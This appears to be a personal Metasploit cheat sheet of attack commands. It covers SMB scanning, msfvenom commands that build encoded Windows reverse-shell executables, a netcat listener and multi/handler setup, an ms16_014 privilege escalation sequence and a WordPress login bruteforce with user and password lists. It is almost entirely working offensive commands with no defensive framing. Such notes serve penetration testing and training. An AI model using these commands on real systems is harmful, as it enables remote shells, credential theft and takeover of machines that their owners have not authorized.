auxiliary
--------------

search type: auxiliary name:smb
use scanner /smb/smb2
info
show options
services -p 445 --rhosts
run or exploit

---------------------------------------Meterpreter-----------------------------------------------------

setg RHOSTS 10.0.0.1 : global set option accross all modules
creds : to check credential after sucessful bruteforcing 

====================================================MSFVenom_with_netcat_reverse========================================

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe

sudo nc -nvlp 53

=========================================: MSFvenom_with_meterpreter===========================================

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe 


Now lets move to msfconsole:
-----------------------------

use exploit/multi/handler 

show options
set payload windows/shell/reverse_tcp
set LHOST 10.10.15.135
set LPORT 1234
exploit

======================================================suggester=========================================================================
run post/multi/recon/local_exploit_suggester

Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
5. In Metasploit (msf > prompt) type: set LPORT 5555
6. In Metasploit (msf > prompt) type: run


=============================================================msf_wordpress=========================================================



msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set URI /wordpress/wp-login.php

URI => /wordpress/wp-login.php

msf auxiliary(wordpress_login_enum) > set PASS_FILE /tmp/passes.txt

PASS_FILE => /tmp/passes.txt

msf auxiliary(wordpress_login_enum) > set USER_FILE /tmp/users.txt

USER_FILE => /tmp/users.txt

msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.1.201

RHOSTS => 192.168.1.201

msf auxiliary(wordpress_login_enum) > run